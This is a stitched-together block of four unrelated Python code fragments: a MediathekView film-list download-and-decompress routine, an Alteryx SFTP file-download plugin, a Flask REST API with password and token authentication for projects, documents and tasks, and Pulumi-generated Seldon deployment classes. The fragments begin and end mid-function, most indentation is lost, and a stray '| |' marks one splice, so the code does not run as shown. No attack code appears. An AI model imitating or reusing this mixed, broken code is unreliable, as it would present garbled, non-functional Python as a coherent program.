# pylint: disable=broad-except
except Exception as err:
# If the universe hates us...
self.logger.debug(
'Could not determine date "{}" of filmliste: {}', value.strip(), err)
except ValueError as err:
pass
self._update_end(full, 'IDLE')
self.logger.info(
'Import of {} in update cycle {} finished. Duration: {} seconds',
destfile,
self.cycle,
int(time.time() - starttime)
)
self.notifier.close_update_progress()
return True
except KeyboardInterrupt:
self._update_end(full, 'ABORTED')
self.logger.info('Update cycle {} interrupted by user', self.cycle)
self.notifier.close_update_progress()
return False
except DatabaseCorrupted as err:
self.logger.error('{} on update cycle {}', err, self.cycle)
self.notifier.close_update_progress()
except DatabaseLost as err:
self.logger.error('{} on update cycle {}', err, self.cycle)
self.notifier.close_update_progress()
except Exception as err:
self.logger.error(
'Error {} while processing {} on update cycle {}', err, destfile, self.cycle)
self._update_end(full, 'ABORTED')
self.notifier.close_update_progress()
return False
def get_newest_list(self, full):
"""
Downloads the database update file
Args:
full(bool): Downloads the full list if `True`
"""
(url, compfile, destfile, _) = self._get_update_info(full)
if url is None:
self.logger.error(
'No suitable archive extractor available for this system')
self.notifier.show_missing_extractor_error()
return False
# cleanup downloads
self.logger.info('Cleaning up old downloads...')
mvutils.file_remove(compfile)
mvutils.file_remove(destfile)
# download filmliste
self.notifier.show_download_progress()
# pylint: disable=broad-except
try:
self.logger.info('Trying to download {} from {}...',
os.path.basename(compfile), url)
self.notifier.update_download_progress(0, url)
mvutils.url_retrieve(
url,
filename=compfile,
reporthook=self.notifier.hook_download_progress,
aborthook=self.monitor.abort_requested
)
except URLError as err:
self.logger.error('Failure downloading {} - {}', url, err)
self.notifier.close_download_progress()
self.notifier.show_download_error(url, err)
return False
except ExitRequested as err:
self.logger.error(
'Immediate exit requested. Aborting download of {}', url)
self.notifier.close_download_progress()
self.notifier.show_download_error(url, err)
return False
except Exception as err:
self.logger.error('Failure writing {}', url)
self.notifier.close_download_progress()
self.notifier.show_download_error(url, err)
return False
# decompress filmliste
if self.use_xz is True:
self.logger.info('Trying to decompress xz file...')
retval = subprocess.call([mvutils.find_xz(), '-d', compfile])
self.logger.info('Return {}', retval)
elif UPD_CAN_BZ2 is True:
self.logger.info('Trying to decompress bz2 file...')
retval = self._decompress_bz2(compfile, destfile)
self.logger.info('Return {}', retval)
elif UPD_CAN_GZ is True:
self.logger.info('Trying to decompress gz file...')
retval = self._decompress_gz(compfile, destfile)
self.logger.info('Return {}', retval)
else:
# should never reach
pass
self.notifier.close_download_progress()
return retval == 0 and mvutils.file_exists(destfile)
def delete_list(self, full):
"""
Deletes locally stored database update files
Args:
full(bool): Deletes the full lists if `True`
"""
(_, compfile, destfile, _) = self._get_update_info(full)
self.logger.info('Cleaning up downloads...')
mvutils.file_remove(compfile)
mvutils.file_remove(destfile)
def _get_update_info(self, full):
if self.use_xz is True:
ext = '.xz'
elif UPD_CAN_BZ2 is True:
ext = '.bz2'
elif UPD_CAN_GZ is True:
ext = '.gz'
else:
return (None, None, None, 0, )
info = self.database.get_native_info(full)
if info is not None:
return (
self._get_update_url(info[0]),
os.path.join(self.settings.datapath, info[1] + ext),
os.path.join(self.settings.datapath, info[1]),
500
)
if full:
return (
FILMLISTE_URL + FILMLISTE_AKT + ext,
os.path.join(self.settings.datapath, FILMLISTE_AKT + ext),
os.path.join(self.settings.datapath, FILMLISTE_AKT),
600,
)
else:
return (
FILMLISTE_URL + FILMLISTE_DIF + ext,
# Tool Mode
self.tool_mode = {
'list': self.ToolMode.LIST_FILES,
'download_file': self.ToolMode.DOWNLOAD_TO_PATH,
'download_blob': self.ToolMode.DOWNLOAD_TO_BLOB
}.get(self._prep_xmltext(xml, 'ToolMode'), self.ToolMode.NONE_MODE)
# File Handling
self.file_handling = {
'keep_files': self.FileHandling.KEEP_FILES,
'delete_files': self.FileHandling.DELETE_FILES,
'move_files': self.FileHandling.MOVE_FILES
}.get(self._prep_xmltext(xml, 'FileHandling'), self.FileHandling.NONE_HANDLING)
# Output Settings
if self.tool_mode == self.ToolMode.DOWNLOAD_TO_PATH:
self.output_settings['local_path'] = self._prep_xmltext(xml, 'LocalPath')
self.output_settings['local_path'] = os.path.join(self.output_settings['local_path'], "")
else:
self.output_settings['local_path'] = None
# Incoming Settings
self.incoming_field = self._prep_xmltext(xml, 'IncomingField')
# Validate settings
self.validate_settings()
# Get Output anchors
self.output_anchor = self.output_anchor_mgr.get_output_anchor('Output')
def pi_add_incoming_connection(self, str_type: str, str_name: str) -> object:
"""
The IncomingInterface objects are instantiated here, one object per incoming connection.
Called when the Alteryx engine is attempting to add an incoming data connection.
:param str_type: The name of the input connection anchor, defined in the Config.xml file.
:param str_name: The name of the wire, defined by the workflow author.
:return: The IncomingInterface object(s).
"""
self.input_optional = IncomingInterface(parent=self)
return self.input_optional
def pi_add_outgoing_connection(self, str_name: str) -> bool:
"""
Called when the Alteryx engine is attempting to add an outgoing data connection.
:param str_name: The name of the output connection anchor, defined in the Config.xml file.
:return: True signifies that the connection is accepted.
"""
return True
def pi_push_all_records(self, n_record_limit: int) -> bool:
"""
Called when no incoming connection is present, i.e. we download all files in the specified directory.
:param n_record_limit: Set it to <0 for no limit, 0 for no records, and >0 to specify the number of records.
:return: True for success, False for failure.
"""
# Don't get data when data is not actually requested
if self.alteryx_engine.get_init_var(self.n_tool_id, 'UpdateOnly') == 'True':
if self.output_recordinfo is not None:
# If we have record info from last time, just push it downstream
self.output_anchor.init(self.output_recordinfo)
return False
# Validate settings, otherwise do not do anything
if not self.validate_settings(silent=True):
return False
# Let's get going...
# Reset progress
self.output_anchor.update_progress(0)
# Prepare SFTP-connection
sftp_conn = self._init_sftp()
if not sftp_conn:
# Something went wrong
return False
# Collect all files and directories
# We need it for any tool mode, so we collect it once
file_list = list()
sftp_files = sftp_conn.listdir_attr()
for fattr in sftp_files:
file_list.append({
'filename': str(fattr.filename),
'size': int(fattr.st_size),
'uid': str(fattr.st_uid),
'gid': str(fattr.st_gid),
'mode': str(pysftp.st_mode_to_int(fattr.st_mode)),
'atime': datetime.utcfromtimestamp(int(fattr.st_atime)).strftime("%Y-%m-%d %H:%M:%S"),
'mtime': datetime.utcfromtimestamp(int(fattr.st_mtime)).strftime("%Y-%m-%d %H:%M:%S"),
'is_file': sftp_conn.isfile(fattr.filename),
'is_dir': sftp_conn.isdir(fattr.filename)
})
# Get everything Alteryx needs
self.output_recordinfo, record_creator, field_dict = self.build_ayx_output(push_metadata=True)
# Iterate through all files in current directory
item_counter = -1
for f in file_list:
# Update progress
item_counter += 1
self.output_anchor.update_progress(item_counter / float(len(file_list)))
if not f['is_file'] and self.tool_mode != self.ToolMode.LIST_FILES:
# If not a file, do not download
self.output_message('"{}{}" is not a file. Skipped.'.format(self.sftp_settings['remote_path'], f['filename']),
messageType=Sdk.EngineMessageType.warning)
continue
# Process file
self._process_file(sftp_conn, f, field_dict, self.output_recordinfo, record_creator)
# Close connection
sftp_conn.close()
# Log Tool input
if self.tool_mode == self.ToolMode.LIST_FILES:
inp_msg = "{} items in found in directory {}{}".format(len(file_list), self.sftp_settings['hostname'], self.sftp_settings['remote_path'])
else:
inp_msg = "{} files downloaded from {}{}".format(len([1 for f in file_list if f['is_file']]), self.sftp_settings['hostname'], self.sftp_settings['remote_path'])
        self.output_message(inp_msg, messageType=Sdk.EngineMessageType.info)
self.output_anchor.update_progress(1)
self.output_anchor.close()
return True
def pi_close(self, b_has_errors: bool):
"""
Called after all records have been processed.
:param b_has_errors: Set to true to not do the final processing.
"""
self.output_anchor.assert_close()
def output_message(self, text: str, messageType = Sdk.EngineMessageType.error):
"""
Little wrapper for Alteryx Engine expression to show a message
:param text: Error message.
:param messageType: Message type in Alteryx (default: error)
"""
self.alteryx_engine.output_message(self.n_tool_id, messageType, self.xmsg(text))
def _process_file(self, sftp_conn: pysftp.Connection, f: dict, field_dict: dict, record_info: object, record_creator: object):
"""Process single remote file.
:param sftp_conn: [description]
:type sftp_conn: pysftp.Connection
:param f: [description]
:type f: dict
:param field_dict: [description]
:type field_dict: dict
:param record_creator: [description]
:type record_creator: object
"""
# These fields are shared by all tool modes (directories only for LIST_FILES)
record_info[field_dict['Filename']].set_from_string(record_creator, f['filename'])
record_info[field_dict['Size']].set_from_int32(record_creator, f['size'])
record_info[field_dict['TimeAdded']].set_from_string(record_creator, f['atime'])
record_info[field_dict['TimeModified']].set_from_string(record_creator, f['mtime'])
if self.tool_mode == self.ToolMode.LIST_FILES:
# Fields only present for LIST_FILES mode
record_info[field_dict['UID']].set_from_string(record_creator, f['uid'])
record_info[field_dict['GID']].set_from_string(record_creator, f['gid'])
record_info[field_dict['Mode']].set_from_string(record_creator, f['mode'])
record_info[field_dict['IsDirectory']].set_from_bool(record_creator, f['is_dir'])
record_info[field_dict['IsFile']].set_from_bool(record_creator, f['is_file'])
        else:
# Download files if not in LIST_FILES mode
if self.tool_mode == self.ToolMode.DOWNLOAD_TO_BLOB:
# Generate temporary filename
out_fname = self.alteryx_engine.create_temp_file_name('tmp')
elif self.tool_mode == self.ToolMode.DOWNLOAD_TO_PATH:
# Build local path for download
out_fname = os.path.join(self.output_settings['local_path'], f['filename'])
# Download file
try:
# Download file to temporary folder
sftp_conn.get(f['filename'], localpath=out_fname)
except IOError as e:
self.output_message('Error transferring file "{}": {}'.format(f['filename'], e))
            # Generate BLOB for Alteryx
            if self.tool_mode == self.ToolMode.DOWNLOAD_TO_BLOB:
                # Read the downloaded file as binary and add it as a blob field
                with open(out_fname, 'rb') as temp_f:
                    blob_content = temp_f.read()
                record_info[field_dict[self.output_settings['blobfield']]].set_from_blob(record_creator, blob_content)
elif self.tool_mode == self.ToolMode.DOWNLOAD_TO_PATH:
# Add file path
record_info[field_dict['FilePath']].set_from_string(record_creator, out_fname)
# Finalize record for this file and push
out_record = record_creator.finalize_record()
self.output_anchor.push_record(out_record, False)
# Reset for next file
record_creator.reset()
# Handle file after it has been downloaded
if self.file_handling == self.FileHandling.MOVE_FILES:
# Check if target folder exists
if not sftp_conn.exists(self.sftp_settings['move_path']):
self.output_message("The target folder {} does not exist.".format(self.sftp_settings['move_path']),
messageType=Sdk.EngineMessageType.warning)
return
# Check if it is actually a folder
if not sftp_conn.isdir(self.sftp_settings['move_path']):
self.output_message("The target folder {} is not a directory.".format(self.sftp_settings['move_path']),
messageType=Sdk.EngineMessageType.warning)
return
# Try to move file
try:
sftp_conn.rename(sftp_conn.pwd + "/" + f['filename'],
sftp_conn.normalize(self.sftp_settings['move_path']) + "/" + f['filename'])
except IOError as e:
self.output_message('Error moving file "{}": {}'.format(f['filename'], e))
else:
self.output_message('File {} moved to {}.'.format(f['filename'], sftp_conn.normalize(self.sftp_settings['move_path'])),
messageType=Sdk.EngineMessageType.info)
elif self.file_handling == self.FileHandling.DELETE_FILES:
# Simply delete file
try:
sftp_conn.remove(sftp_conn.pwd + "/" + f['filename'])
except IOError as e:
self.output_message('Error deleting file "{}": {}'.format(f['filename'], e))
else:
self.output_message('File {} deleted from server.'.format(f['filename']),
messageType=Sdk.EngineMessageType.info)
@staticmethod
def _prep_xmltext(et: Et, key: str) -> str:
"""Wrapper to quickly get settings.
:param et: Element Tree from parsed Xml
:type et: xml.etree.ElementTree
:param key: Name of the setting
:type key: str
:return: Parsed value for setting
:rtype: str
"""
        node = et.find(key)
        t = node.text.strip() if node is not None and node.text is not None else None
        return t if t else None
@staticmethod
def xmsg(msg_string: str) -> str:
"""
A non-interface, non-operational placeholder for the eventual localization of predefined user-facing strings.
:param msg_string: The user-facing string.
:return: msg_string
"""
return msg_string
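# Illustrative sketch only (not part of the plugin): how _prep_xmltext above
# behaves on a hypothetical configuration snippet. Empty or missing settings
# come back as None, everything else as stripped text.
def _example_prep_xmltext():
    import xml.etree.ElementTree as ElementTree
    xml = ElementTree.fromstring('<Configuration><ToolMode> list </ToolMode><LocalPath/></Configuration>')
    assert AyxPlugin._prep_xmltext(xml, 'ToolMode') == 'list'
    assert AyxPlugin._prep_xmltext(xml, 'LocalPath') is None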
class IncomingInterface:
"""
This optional class is returned by pi_add_incoming_connection, and it implements the incoming interface methods, to
be utilized by the Alteryx engine to communicate with a plugin when processing an incoming connection.
Prefixed with "ii", the Alteryx engine will expect the below four interface methods to be defined.
"""
def __init__(self, parent: AyxPlugin):
"""
        Constructor for IncomingInterface.
:param parent: AyxPlugin
"""
# Reference to AyxPlugin
self.ayx_plugin = parent
# RecordInfos in & out
self.record_info_in = None
self.record_info_out = None
# Input Field
self.in_field = None
# Record Creator for outputs
self.record_creator = None
self.field_dict = dict()
# SFTP Connection reference
self.sftp_conn = None
self.file_counter = 0
def ii_init(self, record_info_in: object) -> bool:
"""
        Called to report changes of the incoming connection's record metadata to the Alteryx engine.
:param record_info_in: A RecordInfo object for the incoming connection's fields.
:return: True for success, otherwise False.
"""
if not self.ayx_plugin.incoming_field:
self.ayx_plugin.output_message("No incoming field selected.")
return False
self.in_field = record_info_in.get_field_by_name(self.ayx_plugin.incoming_field, throw_error=False)
if not self.in_field:
self.ayx_plugin.output_message('Field "{}" was not found in the incoming data.'.format(self.ayx_plugin.incoming_field))
return False
# Build everything for outputting data
self.record_info_out, self.record_creator, self.field_dict = self.ayx_plugin.build_ayx_output(push_metadata=True)
self.ayx_plugin.output_recordinfo = self.record_info_out
self.file_counter = 0
return True
def ii_push_record(self, in_record: object) -> bool:
"""
Called when an input record is being sent to the plugin.
:param in_record: The data for the incoming record.
:return: False if method calling limit is hit.
"""
if (in_record is None) or (self.ayx_plugin.alteryx_engine.get_init_var(self.ayx_plugin.n_tool_id, 'UpdateOnly') == 'True'):
return False
# Validate settings
if not self.ayx_plugin.validate_settings(silent=False):
return False
if not self.in_field:
return False
if self.ayx_plugin.tool_mode == self.ayx_plugin.ToolMode.LIST_FILES:
self.ayx_plugin.output_message('"List Files" is not supported when filenames are provided through an incoming connection.')
return False
# If we do not yet have a connection, we need to connect
if not self.sftp_conn:
self.sftp_conn = self.ayx_plugin._init_sftp()
if not self.sftp_conn:
return False
# Current file
cur_fname = self.in_field.get_as_string(in_record)
# Check whether file exists
if not self.sftp_conn.exists(cur_fname):
self.ayx_plugin.output_message('File "{}{}" does not exist. Skipped.'.format(self.ayx_plugin.sftp_settings['remote_path'], cur_fname),
messageType=Sdk.EngineMessageType.warning)
return True
# Check if it is actually a file
if not self.sftp_conn.isfile(cur_fname):
self.ayx_plugin.output_message('File "{}{}" is actually a folder. | |
import json
import logging
from flask import Blueprint, request, g
from flask_restful import Resource, Api
from flask_restful_swagger import swagger
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer, BadSignature, SignatureExpired
from marshmallow import EXCLUDE, ValidationError
from sqlalchemy import func, and_, or_
from sqlalchemy.exc import IntegrityError
from werkzeug.security import generate_password_hash as hash_password, check_password_hash
from lynx import utils
from lynx.model.entities import *
from lynx.model.helpers import js, eg, op
from lynx.shared import *
__all__ = [
'api_blueprint'
]
logger = logging.getLogger(__name__)
api_blueprint = Blueprint('api', __name__, template_folder='templates')
api_blueprint.version = 1
api_blueprint.url_prefix = f'/api/v{api_blueprint.version}'
api_blueprint.config = {}
def get_project(project_id, user_id=None):
if user_id is None:
user_id = g.current_user.id
result = db.session.query(Project, UserRole) \
.join(UserRole, UserRole.project_id == Project.id, isouter=True) \
.filter(and_(Project.id == project_id, or_(UserRole.user_id == user_id, Project.owner_id == user_id))) \
.one_or_none()
    if result is None:
        return None
    project, user_role = result[0], result[1]
# project owner can do anything
if project.owner_id == user_id:
return project
    # otherwise, an admin user_role is required, or the user is not authorized
assert user_role is not None and user_role.role == 'admin', {
'_root': [f'You are not authorized to view the requested project.']}
return project
def get_task(task_id, user_id=None):
if user_id is None:
user_id = g.current_user.id
result = db.session.query(Task, Project, UserRole) \
.join(Project, Project.id == Task.project_id) \
.join(UserRole, UserRole.project_id == Project.id, isouter=True) \
.filter(and_(Task.id == task_id, or_(UserRole.user_id == user_id, Project.owner_id == user_id))) \
.one_or_none()
    if result is None:
        return None
    task, project, user_role = result[0], result[1], result[2]
if project.owner_id == user_id:
return task
assert user_role is not None and user_role.role == 'admin', {
'_root': [f'You are not authorized to view requested task.']}
return task
def get_document(document_id, user_id=None):
if user_id is None:
user_id = g.current_user.id
    result = db.session.query(Document, Project, UserRole) \
        .join(Project, Project.id == Document.project_id) \
        .join(UserRole, UserRole.project_id == Project.id, isouter=True) \
        .filter(and_(Document.id == document_id, or_(UserRole.user_id == user_id, Project.owner_id == user_id))) \
        .one_or_none()
    if result is None:
        return None
    document, project, user_role = result[0], result[1], result[2]
if project.owner_id == user_id:
return document
assert user_role is not None and user_role.role == 'admin', {
'_root': [f'You are not authorized to view requested document.']}
return document
class RestfulAPI(Api):
def handle_error(self, e):
if isinstance(e, ValidationError):
return js.fail(data=e.messages)
if isinstance(e, AssertionError) and len(e.args) > 0:
return js.fail(data=e.args[0])
if isinstance(e, TypeError):
return js.fail(data={'_root': [str(e)]})
if isinstance(e, IntegrityError):
return js.fail(data={'_root': [e.args]})
return js.error(
data={'_root': [
'Service error. Please contact your administrator to resolve the issue.'
]},
message=str(e)
)
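# Illustrative sketch (hypothetical names, not part of the API): the endpoints
# below raise AssertionError with a dict payload to signal authorization and
# validation failures; handle_error above turns that payload into a js.fail(...)
# response for the client.
def _example_guard(resource, user_id):
    assert resource is not None and resource.owner_id == user_id, {
        '_root': ['You are not authorized to view the requested resource.']}
    return resource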
restful = RestfulAPI(api_blueprint)
api = swagger.docs(
restful,
apiVersion=f'{api_blueprint.version}',
api_spec_url='/swagger',
description='Documents all public API endpoints.'
)
@auth.error_handler
def auth_error(status=401):
return js.error('Access Denied', {'auth': [f'Access Denied {status}']}), status
@api_blueprint.record
def record_params(setup_state):
app = setup_state.app
api.config = dict([(key, value) for (key, value) in app.config.items()])
app.config['API_VERSION'] = api_blueprint.version
app.config['API_URL_PREFIX'] = api_blueprint.url_prefix
@auth.verify_password
def verify_password(username, password):
""" Verify the provided username with password and return whether user is authorized.
:param username: username of the user.
:param password: <PASSWORD>.
:return: whether password matches the user\'s password.
"""
user = User.query.filter_by(username=username).one_or_none()
if not user or not check_password_hash(user.password, password):
return False
g.current_user = user
return True
def generate_token(user, expiration=10):
""" Generates a token for user that expires in {expiration} time.
:param user: token is created for provided user.
:param expiration: token will automatically expire in this time.
:return: generated token
"""
s = Serializer(api.config['SECRET_KEY'], expires_in=expiration)
return s.dumps({'id': user.id})
@auth.verify_token
def verify_token(token):
""" Verifies token, loads current user into global variable and return verification status.
:param token: token to verify.
:return: whether token is valid.
"""
s = Serializer(api.config['SECRET_KEY'])
try:
data = s.loads(token)
except SignatureExpired:
return False # valid token, but expired
except BadSignature:
return False # invalid token
user = User.query.get(data['id'])
g.current_user = user
return True
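# Illustrative client-side sketch (not part of the API): exchange HTTP Basic
# credentials for a short-lived token, then authenticate with that token.
# The base_url, the "Bearer" scheme, and the jsend-style response envelope of
# js.success are assumptions; the actual token scheme depends on how `auth` is
# configured in lynx.shared (not shown here).
def _example_client_flow(base_url, username, password):
    import requests
    resp = requests.get(f'{base_url}/api/v1/token', auth=(username, password))
    token = resp.json()['data']['token']
    return requests.get(f'{base_url}/api/v1/projects',
                        headers={'Authorization': f'Bearer {token}'})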
# noinspection PyMethodMayBeStatic
@swagger.model
class TokenEndpoint(Resource):
@swagger.operation(
notes='Retrieve token.',
nickname='retrieve_token',
parameters=[],
responseMessages=[],
)
@auth.login_required
def get(self):
check = bool(request.args.get('check', False))
if check:
return js.success()
token = generate_token(g.current_user)
user_schema = UserSchema()
current_user = user_schema.dump(g.current_user)
return js.success({'token': token.decode('ascii'), 'user': current_user})
# noinspection PyMethodMayBeStatic
@swagger.model
class ProjectsEndpoint(Resource):
@swagger.operation(
notes='Retrieve all projects.',
nickname='retrieve_projects',
parameters=[],
responseMessages=[],
)
@auth.login_required
def get(self):
offset = request.args.get('offset', None)
limit = request.args.get('limit', None)
user_id = g.current_user.id
query = Project.query \
.join(UserRole, UserRole.project_id == Project.id, isouter=True) \
.filter(or_(Project.owner_id == user_id, and_(UserRole.user_id == user_id, UserRole.role == 'admin')))
paginate = utils.paginate(query, limit, offset)
data = ProjectSchema().dump(paginate.items, many=True)
return js.success({
'pagination': {
'page': paginate.page,
'pages': paginate.pages,
'has_prev': paginate.has_prev,
'has_next': paginate.has_next,
'per_page': paginate.per_page,
'total': paginate.total,
'items': data,
},
})
@swagger.operation(
notes='Creates project with provided data.',
nickname='create_projects',
parameters=[
{
"name": "project",
"description": f'Project to Import. <br> Example: {eg.project}',
"required": True,
"allowMultiple": False,
"dataType": Project.__name__,
"paramType": "body",
}
],
responseMessages=[],
)
@auth.login_required
def post(self):
data = request.get_json()
# add user details as owner
data['owner_id'] = g.current_user.id
schema = ProjectSchema()
data = schema.load(data, unknown=EXCLUDE)
project = Project(**data)
# Create project (do not commit)
op.create_object(project)
data = schema.dump(project)
return js.success(data)
# noinspection PyMethodMayBeStatic
@swagger.model
class ProjectByIDEndpoint(Resource):
@swagger.operation(
notes='Retrieve project with provided ID.',
nickname='retrieve_project',
parameters=[],
responseMessages=[],
)
@auth.login_required
def get(self, project_id):
project = get_project(project_id)
data = ProjectSchema().dump(project)
return js.success(data)
@swagger.operation(
notes='Updates project with provided data.',
nickname='update_projects',
parameters=[{
"name": "project",
"description": f'Project to Update. <br> Example: {eg.project}',
"required": True,
"allowMultiple": False,
"dataType": Project.__name__,
"paramType": "body",
}],
responseMessages=[],
)
@auth.login_required
def put(self, project_id):
data = request.get_json()
schema = ProjectSchema()
schema.load(data, partial=True, unknown=EXCLUDE)
project = get_project(project_id)
op.update_object(project, data)
data = schema.dump(project)
return js.success(data)
@swagger.operation(
notes='Deletes project with provided project ID.',
nickname='delete_projects',
parameters=[],
responseMessages=[],
)
@auth.login_required
def delete(self, project_id):
project = get_project(project_id)
op.delete_object(project)
return js.success()
# noinspection PyMethodMayBeStatic
@swagger.model
class DocumentsEndpoint(Resource):
@swagger.operation(
notes='Gets documents belonging to a project.',
nickname='retrieve_documents',
parameters=[],
responseMessages=[],
)
@auth.login_required
def get(self, project_id):
offset = request.args.get('offset', None)
limit = request.args.get('limit', None)
user_id = g.current_user.id
query = Document.query \
.join(Project, Project.id == Document.project_id) \
.join(UserRole, UserRole.project_id == Project.id, isouter=True) \
.filter(or_(and_(UserRole.user_id == user_id, UserRole.role == 'admin'),
Project.owner_id == user_id)) \
.filter(Project.id == project_id)
paginate = utils.paginate(query, limit, offset)
data = DocumentSchema().dump(paginate.items, many=True)
return js.success({
'pagination': {
'page': paginate.page,
'pages': paginate.pages,
'has_prev': paginate.has_prev,
'has_next': paginate.has_next,
'per_page': paginate.per_page,
'total': paginate.total,
'items': data,
},
})
@swagger.operation(
notes='Creates document with provided data.',
nickname='create_documents',
parameters=[
{
"name": "document",
"description": f'Document to Import. '
f'<br> Example 1: {eg.document} '
f'<br> or '
f'<br> Example 2: {eg.document_many}',
"required": True,
"allowMultiple": True,
"dataType": Document.__name__,
"paramType": "body",
}
],
responseMessages=[],
)
@auth.login_required
def post(self, project_id):
# Authorize & Validate
assert get_project(project_id) is not None, {'data': {
'_root': 'Invalid project. Please try with a valid project ID.'
}}
if 'file' in request.files:
file = request.files['file']
payload = self.process_file(file)
else:
payload = request.get_json()
if isinstance(payload, list):
for d in payload:
d.update({'project_id': project_id})
data = DocumentSchema().load(payload, many=True, unknown=EXCLUDE)
documents = [Document(**d) for d in data]
op.create_object(documents, many=True)
else:
payload.update({'project_id': project_id})
data = DocumentSchema().load(payload, unknown=EXCLUDE)
document = Document(**data)
op.create_object(document)
return js.success()
def process_file(self, file):
if file and file.filename.endswith('json'):
data = file.read().decode(api.config.get('ENCODING', 'utf-8'))
try:
documents = json.loads(data.strip())
except json.decoder.JSONDecodeError:
# Try each-line-json format
documents = []
skipped = []
for line in data.split('\n'):
try:
documents.append(json.loads(line.strip()))
except json.decoder.JSONDecodeError:
                        skipped.append(line)
return documents
return []
# noinspection PyMethodMayBeStatic
@swagger.model
class DocumentByIDEndpoint(Resource):
@swagger.operation(
notes='Updates document with provided data.',
nickname='update_document',
parameters=[{
"name": "project",
"description": f'Document to Update. <br> Example: {eg.document}',
"required": True,
"allowMultiple": False,
"dataType": Document.__name__,
"paramType": "body",
}],
responseMessages=[],
)
@auth.login_required
def put(self, project_id, document_id):
# get params
data = request.get_json()
# Authenticate and get
document = get_document(document_id)
# update object
op.update_object(document, data)
# return updated
data = DocumentSchema().dump(document)
return js.success(data)
@swagger.operation(
notes='Deletes document with provided document ID.',
nickname='delete_document',
parameters=[],
responseMessages=[],
)
@auth.login_required
def delete(self, project_id, document_id):
# Authenticate and get
document = get_document(document_id)
# delete document
op.delete_object(document)
# return success
return js.success()
# noinspection PyMethodMayBeStatic
@swagger.model
class TasksEndpoint(Resource):
@swagger.operation(
notes='Gets tasks belonging to a project.',
nickname='retrieve_tasks',
parameters=[],
responseMessages=[],
)
@auth.login_required
def get(self, project_id):
# Assert project authorization for authenticated user
user_id = g.current_user.id
tasks = Task.query \
.join(Project, Project.id == Task.project_id) \
.join(UserRole, UserRole.project_id == Project.id, isouter=True) \
.filter(or_(and_(UserRole.user_id == user_id, UserRole.role == 'admin'),
Project.owner_id == user_id)) \
.filter_by(project_id=project_id) \
.all()
data = TaskSchema().dump(tasks, many=True)
return js.success(data)
@swagger.operation(
notes='Creates task with provided data.',
nickname='create_tasks',
parameters=[
{
"name": "task",
"description": f'Task to Import. <br> Example: {eg.task}',
"required": True,
"allowMultiple": False,
"dataType": Task.__name__,
"paramType": "body",
}
],
responseMessages=[],
)
@auth.login_required
def post(self, project_id):
# authenticate
project = get_project(project_id)
# Validate
assert project is not None, {'data': {
'_root': 'Invalid project. Please try with a valid project ID.'
}}
        data = request.get_json()
        :param bool read_only: Mounted read-only if true, read-write otherwise (false or unspecified). Defaults to false.
:param str sub_path: Path within the volume from which the container's volume should be mounted. Defaults to "" (volume's root).
:param str sub_path_expr: Expanded path within the volume from which the container's volume should be mounted. Behaves similarly to SubPath but environment variable references $(VAR_NAME) are expanded using the container's environment. Defaults to "" (volume's root). SubPathExpr and SubPath are mutually exclusive.
"""
pulumi.set(__self__, "mount_path", mount_path)
pulumi.set(__self__, "name", name)
if mount_propagation is not None:
pulumi.set(__self__, "mount_propagation", mount_propagation)
if read_only is not None:
pulumi.set(__self__, "read_only", read_only)
if sub_path is not None:
pulumi.set(__self__, "sub_path", sub_path)
if sub_path_expr is not None:
pulumi.set(__self__, "sub_path_expr", sub_path_expr)
@property
@pulumi.getter(name="mountPath")
def mount_path(self) -> str:
"""
Path within the container at which the volume should be mounted. Must not contain ':'.
"""
return pulumi.get(self, "mount_path")
@property
@pulumi.getter
def name(self) -> str:
"""
This must match the Name of a Volume.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="mountPropagation")
def mount_propagation(self) -> Optional[str]:
"""
mountPropagation determines how mounts are propagated from the host to container and the other way around. When not set, MountPropagationNone is used. This field is beta in 1.10.
"""
return pulumi.get(self, "mount_propagation")
@property
@pulumi.getter(name="readOnly")
def read_only(self) -> Optional[bool]:
"""
Mounted read-only if true, read-write otherwise (false or unspecified). Defaults to false.
"""
return pulumi.get(self, "read_only")
@property
@pulumi.getter(name="subPath")
def sub_path(self) -> Optional[str]:
"""
Path within the volume from which the container's volume should be mounted. Defaults to "" (volume's root).
"""
return pulumi.get(self, "sub_path")
@property
@pulumi.getter(name="subPathExpr")
def sub_path_expr(self) -> Optional[str]:
"""
Expanded path within the volume from which the container's volume should be mounted. Behaves similarly to SubPath but environment variable references $(VAR_NAME) are expanded using the container's environment. Defaults to "" (volume's root). SubPathExpr and SubPath are mutually exclusive.
"""
return pulumi.get(self, "sub_path_expr")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsExplainerEndpoint(dict):
def __init__(__self__, *,
grpc_port: Optional[int] = None,
http_port: Optional[int] = None,
service_host: Optional[str] = None,
service_port: Optional[int] = None,
type: Optional[str] = None):
if grpc_port is not None:
pulumi.set(__self__, "grpc_port", grpc_port)
if http_port is not None:
pulumi.set(__self__, "http_port", http_port)
if service_host is not None:
pulumi.set(__self__, "service_host", service_host)
if service_port is not None:
pulumi.set(__self__, "service_port", service_port)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="grpcPort")
def grpc_port(self) -> Optional[int]:
return pulumi.get(self, "grpc_port")
@property
@pulumi.getter(name="httpPort")
def http_port(self) -> Optional[int]:
return pulumi.get(self, "http_port")
@property
@pulumi.getter
def service_host(self) -> Optional[str]:
return pulumi.get(self, "service_host")
@property
@pulumi.getter
def service_port(self) -> Optional[int]:
return pulumi.get(self, "service_port")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsGraph(dict):
def __init__(__self__, *,
name: str,
children: Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildren']] = None,
endpoint: Optional['outputs.SeldonDeploymentSpecPredictorsGraphEndpoint'] = None,
env_secret_ref_name: Optional[str] = None,
implementation: Optional[str] = None,
logger: Optional['outputs.SeldonDeploymentSpecPredictorsGraphLogger'] = None,
methods: Optional[Sequence[str]] = None,
model_uri: Optional[str] = None,
parameters: Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphParameters']] = None,
service_account_name: Optional[str] = None,
type: Optional[str] = None):
"""
:param 'SeldonDeploymentSpecPredictorsGraphLoggerArgs' logger: Request/response payload logging. v2alpha1 feature that is added to v1 for backwards compatibility while v1 is the storage version.
"""
pulumi.set(__self__, "name", name)
if children is not None:
pulumi.set(__self__, "children", children)
